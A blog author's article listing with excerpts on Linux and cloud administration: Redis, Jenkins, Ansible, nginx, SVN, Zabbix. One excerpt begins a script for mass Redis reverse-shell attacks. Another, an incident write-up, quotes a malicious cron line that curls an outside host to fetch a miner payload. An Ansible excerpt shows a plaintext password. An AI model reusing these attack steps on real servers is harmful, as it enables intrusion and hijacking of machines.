Linux
关注
分享
扫一扫
文章平均质量分 51
十月鱼
这个作者很懒,什么都没留下…
展开
-
rinetd代理阿里云redis导致服务器cpu满载
一、应用场景场景阿里云官方文档中的redis公网访问方案使用了rinetd作为代理工具,这个工具并不适合公司场景。一旦访问人数过多就会服务不可用,在这一点上我觉得阿里云没有测试方案的稳定性就给用户使用。二、部署方案通过nginx的stream模块,代理阿里云redis和阿里云memcache。参考教程:https://help.aliyun.com/document_detail/...原创 2018-08-27 23:23:24 · 1060 阅读 · 0 评论 -
eval的作用(非常重要)
一、场景eval会对后面的cmdLine进行两遍扫描,如果第一遍扫描后,cmdLine是个普通命令,则执行此命令;如果cmdLine中含有变量的间接引用,则保证间接引用的语义。 我不止一次遇到过这种问题。在shell给mysql传参,在shell给python传参,shell给数组传参。 区别就是在一些场景无伤大雅,一些场景就读不出这个值就无法执行下去。mysql -e传参就是这个情况。e...原创 2018-06-12 15:45:08 · 3657 阅读 · 0 评论 -
shell脚本实现批量自动redis反弹shell攻击
一、shell实现redis反弹shell[root@xingcheng attack]# cat shell_rebound.sh#!/bin/bash##create by xingcheng##20180403##function 批量redis反弹shell获取系统权限,主要针对没有安全策略的reids服务器和弱口令redis服务器,他们往往使用root账户运行#ip_...原创 2018-04-03 17:09:56 · 1560 阅读 · 0 评论 -
服务器攻击之reids篇(2018.4.2)
一、事故原因开发使用测试机redis 1.开放0.0.0.0 2.密码使用弱口令 3.使用root用户运行redis梳理一下被黑过程 扫描服务器端口 –> 弱口令拿到reids权限 –> 反弹shell写入秘钥 –> 肉鸡(修改计划任务,挖矿)贴一下被修改的计划任务,*/5 * * * * curl -fsSL http://165.225.157...原创 2018-04-02 20:14:58 · 554 阅读 · 0 评论 -
阿里云SLB配置
一、简介负载均衡(Server Load Balancer)是对多台云服务器进行流量分发的负载均衡服务。负载均衡可以通过流量分发扩展应用系统对外的服务能力,通过消除单点故障提升应用系统的可用性。二、配置SLB1.购买SLB并接入交换机 公网SLB是可以直接分发到内网服务器的,这样可以不占用公网带宽。 这里使用内网SLB示例,因为免费。2.配置后端服务器 (1)环境介绍...原创 2018-03-21 15:17:55 · 10526 阅读 · 0 评论 -
阿里云
阿里云 弹性伸缩自定义镜像阿里云SLB配置原创 2018-03-21 15:04:16 · 303 阅读 · 0 评论 -
Nosql优化(待补充)
redis,mongodb,memcached的一定要注意优化,跟Mysql参数优化与一样重要。今天开发把服务器搞挂了,redis吃了60+G内存。 教训: 1.重要数据直接存进数据库 2.redis优化。设置maxmemory等。下次补上优化参数...原创 2018-03-20 15:31:17 · 458 阅读 · 0 评论 -
Jenkins配置任务(SVN)及追加Execute shell
Jenkins配置任务(SVN)及追加Execute shell先放一张我设计的架构图。如果需要一个自动更新的测试环境,可以再增加一个svn自动更新的代码目录。一、添加用户1.http://localhost:8080/2.二、新建任务Jenkins主页 --> 新建 --> 任务名称:aoc --> 构建一个自由风格的软件项目 --> 确定如果需要增加shell语句。点...原创 2018-03-23 10:48:13 · 4217 阅读 · 0 评论 -
Jenkin之Jenkins安装
Jenkin之Jenkins安装一、安装JenkinsJenkins的安装一般非常简单,官网就有安装教程https://pkg.jenkins.io/redhat-stable/1.yum安装Jenkinswget -O /etc/yum.repos.d/jenkins.repo https://pkg.jenkins.io/redhat-stable/jenkins.reporpm --imp...原创 2018-03-23 10:06:59 · 274 阅读 · 0 评论 -
Jenkins之安装JDK
一、JDK的安装 1.JDK和JRE的区别JRE: Java Runtime Environment JDK:Java Development KitJRE顾名思义是java运行时环境,包含了java虚拟机,java基础类库。是使用java语言编写的程序运行所需要的软件环境,是提供给想运行java程序的用户使用的。 JDK顾名思义是java开发工具包,是程序员使用...原创 2018-03-23 09:53:50 · 2874 阅读 · 0 评论 -
使用ansible批量管理远程服务器
使用ansible批量管理远程服务器背景本地需要管理远程的一批服务器,主要执行以下任务:1) 将本地的文件复制到远端所有服务器; 2) 需要在远程服务器中执行一个个命令;远端服务器路径并非完全一致,一般访问通过环境变量中定义的变量路径访问; 比如在.bashrc中定义$app_path=/opt/app/bin最终选择ansible,使用这个自动化运维工具可以满足我的需求;...原创 2018-03-23 09:46:41 · 975 阅读 · 0 评论 -
/etc/profile和/etc/profile.d都不生效
一、问题新买的阿里云服务器,/etc/profile和/etc/profile.d都不生效。[root@ Cartoon ~]# vim /etc/profile.d/nodejs.sh #set for nodejsNODE_HOME=/usr/local/node/8.10.0PATH=$PATH:$NODE_HOME/binexport NODE_HOME PATH...原创 2018-03-15 16:39:36 · 5467 阅读 · 1 评论 -
shell编程之数组及变量的多功能用法
shell编程之数组及变量的多功能用法转载 2018-06-12 16:39:08 · 212 阅读 · 0 评论 -
批量shell实现交互登录普通用户,切换root用户,并执行shell语句。
一、环境介绍对100台服务器进行登录,增加jumpserver管理里用户。由于所有服务器root禁止登录,导致需要多层交互。二、思路1、通过expect批量shell实现交互登录普通用户,切换root用户,并执行shell语句。 2、python实现三、shell实现ps:感觉白写了,交互速度大概5秒一台。建议用python实现[root@jumpserver s...原创 2018-06-08 16:41:55 · 7904 阅读 · 4 评论 -
Ansible普通用户sudo执行指令
一、应用场景1.linux机器都禁止使用root远程登陆,需要ansible来实现切换用户文件分发。二、实验步骤1、配置资源清单hosts文件[root@master playbook]# cat /etc/ansible/hosts[test_su]192.168.1.232 ansible_ssh_user=saas ansible_ssh_pass='xE#bH2bm...转载 2018-08-20 14:34:11 · 18145 阅读 · 0 评论 -
Devops之Ansible大规模主机部署
利用Ansible构建playbook,数百机器并发装机。1.创建用户和密钥useradd Developmentsu Developmentcd ~/mkdir .sshchmod 700 .sshcd .ssh/(cat << EOFssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb原创 2018-08-10 11:13:36 · 1211 阅读 · 0 评论 -
Ansible的Playbook详解及示例
一、Playbook 简介 Playbooks与Ad-Hoc相比,是一种完全不同的运用Ansible的方式,而且是非常之强大的;也是系统ansible命令的集合,其利用yaml语言编写,运行过程,ansbile-playbook命令根据自上而下的顺序依次执行。 简单来说,Playbooks 是一种简单的配置管理系统与多机器部署系统的基础。与现有的其他系统有不同之处,且非常适合于复杂应用...原创 2018-08-10 11:01:51 · 3071 阅读 · 0 评论 -
自建Mysql迁移阿里云RDS
一、应用场景1.本地自建Mysql迁移到阿里云RDS 2.阿里云RDS不支持基于文件层面的导入导出,导出sql文件进行数据迁移。 3.建议使用命令进行数据迁移,而不是通过工具。因为通过工具非常慢,使用Mysqldump导出,mysql导入。二、迁移过程(以禅道举例)1.导出sql文件/usr/local/mysql/bin/mysqldump -h127.0.0.1 -uzen...原创 2018-07-06 18:37:52 · 1075 阅读 · 0 评论 -
安装Confluence
一、安装教程1.破解教程 https://www.cnblogs.com/Javame/p/8779772.html2.设置数据库字符集utf8-bin https://confluence.atlassian.com/kb/how-to-fix-the-collation-and-character-set-of-a-mysql-database-744326173.html3....转载 2018-07-06 18:12:46 · 1488 阅读 · 0 评论 -
Confluence无法发送邮件修复
一、应用场景1.配置好Confluence后无法发送找回密码邮件。二、问题处理1.我首先申领了一个网易的邮箱,然后找到网易邮箱的配置如下:主机名:smtp.163.com端口号:25或465常规的思路是填写25号端口,因此,我填入25号端口以后,发现根本连接不上smtp.163.com这个邮件服务器,很郁闷。报错信息如下:An error has occurr...转载 2018-07-06 18:04:54 · 6353 阅读 · 8 评论 -
xshell显示Tomcat日志中文乱码
一、环境介绍Tomcat服务器,部分服务器xshell显示Tomcat日志中文乱码。我这里给大家讲一个排查思路。 显示乱码说到底就几个问题。 1.系统字符集(解决办法网上很多) 2.连接软件字符集(xshell,crt等字符集设置,网上也有很多) 3.系统服务器字符集问题。(如果你想单纯显示,那么修改字符集为GBK就可以了,如果想统一字符集方便管理,那么往下看。)二、修复显示乱码问...原创 2018-07-04 14:28:39 · 1110 阅读 · 0 评论 -
阿里云磁盘扩容
一、应用场景1.随着业务的增长,您的磁盘容量可能无法满足数据存储的需要,这时您可以使用磁盘扩容功能扩容磁盘盘。 2.阿里云支持系统盘扩容和数据盘扩容。 3.所有涉及数据的东西都需要备份。量大可以使用阿里云快照,量小可以rsync等。二、扩容系统盘系统盘 通过 更换系统盘 功能变更系统盘容量时,只能保持容量不变或者增加容量,不能缩小容量。比如,一台CentOS实例扩容前系统盘容量...转载 2018-07-09 16:20:03 · 4830 阅读 · 0 评论 -
Redis自动安装脚本
一、安装方式1.yum 2.rpm 3.编译安装1、2方式比较简单不做介绍,下面是自动编译安装脚本。二、编译安装#!/bin/bash##Date 2017/11/30##create by xingcheng##function nosql_install.shredis_install(){#编译安装cd /usr/local/srcwget http:/...原创 2018-07-01 10:35:33 · 1163 阅读 · 0 评论 -
SVN常用问题处理办法(待补充)
一、报错Skipped ‘wechatnews’ – Node remains in conflict[xingcheng@XdnwmfZ views]$ sudo svn update wechatnewsSkipped 'wechatnews' -- Node remains in conflictSummary of conflicts: Skipped paths: 1[...原创 2018-02-27 11:26:59 · 655 阅读 · 0 评论 -
centos7.3服务器流量满载排查(nginx代理被攻击)
一、服务器环境Centos 7.3 4核16G VPS 10Mbps 新服务器,就跑了2个小业务,但是流量满了,导致数据库都打不开。二、排查流程1.查看监控流量提醒大家业务服务器一定要第一时间装上监控,阿里云的或者zabbix。我当时没装,出问题的时候装很卡,非常痛苦。 监控显示VPS使用率已经90%了,查看实时流量吧。2.用iftop命令查看实时流量发送情况原创 2018-01-11 16:21:28 · 3975 阅读 · 0 评论 -
exec的多种运用
http://blog.youkuaiyun.com/21aspnet/article/details/7487770原创 2017-11-27 17:06:12 · 1001 阅读 · 0 评论 -
phpinfo显示Scan this dir for additional .ini files (none) Additional .ini files parsed (none)
Scan this dir for additional .ini files (none) 设置加载ini文件的目录 Additional .ini files parsed (none) 已经被加载的ini文件 Scan this dir for additional .ini files /usr/local/php56/etc/php.d Additional .ini原创 2017-11-04 19:16:44 · 5474 阅读 · 0 评论 -
nginx报错Scan this dir for additional .ini files (none) Additional .ini files parsed (none)
Scan this dir for additional .ini files (none)Additional .ini files parsed (none)原创 2017-11-04 19:01:36 · 1680 阅读 · 0 评论 -
zabbix3.X配置邮件监控
一环境准备二告警脚本shell脚本python脚本三zabbix图形界面配置设置media类型一、环境准备1.确保zabbix的server和client已经成功配置。 zabbix IP version Server 192.168.1.1 3.4.0beta2 Client 192.168.1.2 X二、告警脚本1. shell脚本通过sendmai原创 2017-08-31 15:24:50 · 717 阅读 · 0 评论 -
编译php报错cc: 编译器内部错误:已杀死(程序 cc1) Please submit a full bug report, with preprocessed source if appropri
报错信息7.0.23/ext/fileinfo/ -DPHP_ATOM_INC -I/usr/local/src/php-7.0.23/include -I/usr/local/src/php-7.0.23/main -I/usr/local/src/php-7.0.23 -I/usr/local/src/php-7.0.23/ext/date/lib -I/usr/include/libxml2转载 2017-09-23 14:50:34 · 7602 阅读 · 0 评论 -
阿里云apache 搭建https
一、搭建好apache运行环境,测试apache默认主机和虚拟主机都可以访问。二、证书部署文件说明: ( 1 ) 在Apache的安装目录下创建cert目录,并且将下载的全部文件拷贝到cert目录中。如果申请证书时是自己创建的CSR文件,请将对应的私钥文件放到cert目录下并且命名为214186100710218.key;( 2 ) 打开 apache 安装目录下 conf 目录中的 httpd.原创 2017-08-23 16:35:54 · 706 阅读 · 0 评论 -
linux, kill掉占用60%多cpu的进程,几秒后换个pid 和 command 又出现
转自linux, kill掉占用60%多cpu的进程,几秒后换个pid 和 command 又出现?快速清理木马流程。 假设木马的名字是xysbqaxjqy,如果top看不到,可以在/etc/init.d目录下面查看1、首先锁定三个目录,不能让新木马文件产生 chmod 000 /usr/bin/xysbqaxjqy chattr +i /usr/bin chattr +i /bin转载 2017-08-14 18:57:16 · 1193 阅读 · 0 评论 -
SVN报错Warning: post-commit hook failed (exit code 1) with output:
报错内容[root@abc22222222 wechatbi]# svn commit -m “” 1.txt Sending 1.txt Transmitting file data . Committed revision 343.Warning: post-commit hook failed (exit code 1) with output: 在 “/web/wec原创 2017-08-14 16:02:05 · 12708 阅读 · 0 评论 -
Centos6.5编译php报错:configure: error: mcrypt.h not found. Please reinstall libmcrypt.
configure: error: mcrypt.h not found. Please reinstall libmcrypt.解决办法:[root@xclinux php-5.3.27]# yum install libmcrypt-devel -y 安装libmcrypLoaded plugins: fastestmirrorLoading mirr原创 2016-04-24 22:41:00 · 4879 阅读 · 0 评论 -
分布式代码管理工具Git安装和使用(linux)
版本管理介绍git介绍git安装和使用安装git centos上 yum install -y epel-release yum install -y git创建版本库 mkdir /home/gitroot cd /home/gitroot git init //用这个命令初始化,让这个目录变成git可以管理的仓库提交文件到仓库 创建一个文件 1.txt echo -e原创 2017-08-10 16:07:54 · 647 阅读 · 0 评论 -
linux scp命令
目录目录一 scp介绍二 scp命令与参数1命令格式2命令功能3命令参数三 scp的实际运用1使用实例一 、 scp介绍scp是secure copy的简写,用于在Linux下进行远程拷贝文件的命令,和它类似的命令有cp,不过cp只是在本机进行拷贝不能跨服务器,而且scp传输是加密的。可能会稍微影响一下速度。当你服务器硬盘变为只读 read only system时,用scp可以原创 2017-08-10 10:54:39 · 423 阅读 · 0 评论 -
nginx日志报错upstream timed out (110: Connection timed out)
一 、 nginx日志报错upstream timed out (110: Connection timed out)2017/08/04 08:10:06 [error] 27269#0: *34444805 upstream timed out (110: Connection timed out) while reading response header from upstream, cli原创 2017-08-10 16:30:44 · 45934 阅读 · 1 评论 -
trap命令
本文作者笔记体系归档:http://blog.youkuaiyun.com/qq_32642039/article/details/78489918 trap命令 trap命令用于指定在接收到信号后将要采取的动作,常见的用途是在脚本程序被中断时完成清理工作。当shell接收到sigspec指定的信号时,arg参数(命令)将会被读取,并被执行。例如: trap “exit 1” HUP INT PIPE QUI原创 2017-11-29 09:56:39 · 521 阅读 · 0 评论 -
nginx日志报错(11: Resource temporarily unavailable) while connecting to upstream
[error] 2312#0: *11017288 connect() to unix:/tmp/php-fcgi.sock failed (11: Resource temporarily unavailable) while connecting to upstream, client: 140.207.54.80, server: phalcontest2.zx04.com, request:原创 2018-01-09 19:13:59 · 11073 阅读 · 0 评论 -
Zabbix server is not running:the information displayed may not be current
zabbix报错: Zabbix server is not running:the information displayed may not be current 1. 网上的教程基本都没用,并且因为无法启动导致日志也没有输出。查看/etc/init.d/zabbix文件,发现启动的调用的是/usr/local/zabbix/sbin/zabbix_server。直接启动成功。2.进原创 2018-01-07 11:04:43 · 1421 阅读 · 0 评论